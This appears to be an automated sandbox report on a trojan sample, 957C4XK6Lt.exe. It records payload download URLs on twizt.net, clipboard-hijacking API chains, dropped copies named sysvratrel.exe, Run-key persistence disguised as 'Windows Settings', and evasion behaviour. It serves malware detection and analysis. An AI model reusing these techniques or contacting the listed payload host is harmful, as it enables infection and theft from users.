                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/=
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/new
                                Source: 957C4XK6Lt.exe, 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
                                Source: 957C4XK6Lt.exeString found in binary or memory: http://twizt.net/newtpp.exeP0
                                Source: 957C4XK6Lt.exe, 00000000.00000000.2068632504.0000000000532000.00000002.00000001.01000000.00000003.sdmp, 957C4XK6Lt.exe, 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://twizt.net/newtpp.exeP0S
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.z%
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/pei
                                Source: 957C4XK6Lt.exeString found in binary or memory: http://twizt.net/peinstall.php
                                Source: 957C4XK6Lt.exeString found in binary or memory: http://twizt.net/peinstall.php%temp%%s
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.php5%z
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpb
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpm%
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpshqos.dll.muiS9
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpystem32
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_00405910
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_004048A0
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_004048A0
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_004048A0
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_00405910
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_00405910

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: Yara matchFile source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\sysvratrel.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\sysvratrel.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980,3_2_0040D6E0
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040F319 NtQueryVirtualMemory,3_2_0040F319
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980,5_2_0040D6E0
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040F319 NtQueryVirtualMemory,5_2_0040F319
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980,8_2_0040D6E0
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040F319 NtQueryVirtualMemory,8_2_0040F319
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile created: C:\Windows\sysvratrel.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040F0DC3_2_0040F0DC
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_004040903_2_00404090
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_004048A03_2_004048A0
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040A7403_2_0040A740
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00407D603_2_00407D60
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00407D893_2_00407D89
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040F0DC5_2_0040F0DC
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_004040905_2_00404090
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_004048A05_2_004048A0
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040A7405_2_0040A740
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00407D605_2_00407D60
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00407D895_2_00407D89
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040F0DC8_2_0040F0DC
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_004040908_2_00404090
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_004048A08_2_004048A0
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040A7408_2_0040A740
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00407D608_2_00407D60
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00407D898_2_00407D89
                                Source: 957C4XK6Lt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engineClassification label: mal100.troj.evad.winEXE@8/7@1/60
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00406B30 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,3_2_00406B30
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00407230 CoCreateInstance,3_2_00407230
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeMutant created: \Sessions\1\BaseNamedObjects\ax765638x6xa
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeFile created: C:\Users\user\AppData\Local\Temp\135143440.exeJump to behavior
                                Source: 957C4XK6Lt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: 957C4XK6Lt.exeReversingLabs: Detection: 68%
                                Source: 957C4XK6Lt.exeVirustotal: Detection: 55%
                                Source: unknownProcess created: C:\Users\user\Desktop\957C4XK6Lt.exe "C:\Users\user\Desktop\957C4XK6Lt.exe"
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeProcess created: C:\Users\user\AppData\Local\Temp\135143440.exe C:\Users\user\AppData\Local\Temp\135143440.exe
                                Source: unknownProcess created: C:\Users\user\sysvratrel.exe "C:\Users\user\sysvratrel.exe"
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeProcess created: C:\Users\user\AppData\Local\Temp\1682018248.exe C:\Users\user\AppData\Local\Temp\1682018248.exe
                                Source: unknownProcess created: C:\Windows\sysvratrel.exe "C:\Windows\sysvratrel.exe"
                                Source: unknownProcess created: C:\Users\user\sysvratrel.exe "C:\Users\user\sysvratrel.exe"
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeProcess created: C:\Users\user\AppData\Local\Temp\135143440.exe C:\Users\user\AppData\Local\Temp\135143440.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeProcess created: C:\Users\user\AppData\Local\Temp\1682018248.exe C:\Users\user\AppData\Local\Temp\1682018248.exeJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\sysvratrel.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\sysvratrel.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\sysvratrel.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\sysvratrel.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\sysvratrel.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\sysvratrel.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\sysvratrel.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                                Source: 957C4XK6Lt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: 957C4XK6Lt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: 957C4XK6Lt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: 957C4XK6Lt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: 957C4XK6Lt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: 957C4XK6Lt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeCode function: 0_2_00531A91 push ecx; ret 0_2_00531AA4

                                Persistence and Installation Behavior

                                barindex
                                Source: unknownExecutable created and started: C:\Windows\sysvratrel.exe
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exeJump to dropped file
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeFile created: C:\Users\user\AppData\Local\Temp\135143440.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile created: C:\Users\user\AppData\Local\Temp\1682018248.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile created: C:\Windows\sysvratrel.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile created: C:\Users\user\sysvratrel.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile created: C:\Users\user\sysvratrel.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile created: C:\Windows\sysvratrel.exeJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile created: C:\Users\user\sysvratrel.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValueJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeFile opened: C:\Users\user\AppData\Local\Temp\135143440.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile opened: C:\Users\user\AppData\Local\Temp\135143440.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeFile opened: C:\Users\user\AppData\Local\Temp\1682018248.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040CF303_2_0040CF30
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040CF305_2_0040CF30
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040CF308_2_0040CF30
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-4354
                                Source: C:\Users\user\sysvratrel.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-4353
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-4354
                                Source: C:\Users\user\sysvratrel.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-4353
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeWindow / User API: threadDelayed 6250Jump to behavior
                                Source: C:\Users\user\sysvratrel.exeEvaded block: after key decisiongraph_5-4353
                                Source: C:\Users\user\sysvratrel.exeEvaded block: after key decisiongraph_8-4353
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_3-5742
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_3-4383
                                Source: C:\Users\user\sysvratrel.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-4372
                                Source: C:\Users\user\sysvratrel.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_5-5281
                                Source: C:\Users\user\sysvratrel.exeAPI coverage: 0.9 %
                                Source: C:\Users\user\sysvratrel.exeAPI coverage: 0.9 %
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040CF303_2_0040CF30
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040CF308_2_0040CF30
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 2304Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756Thread sleep time: -40000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756Thread sleep count: 6250 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756Thread sleep time: -12500000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_00406650
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406510
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00406650
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406510
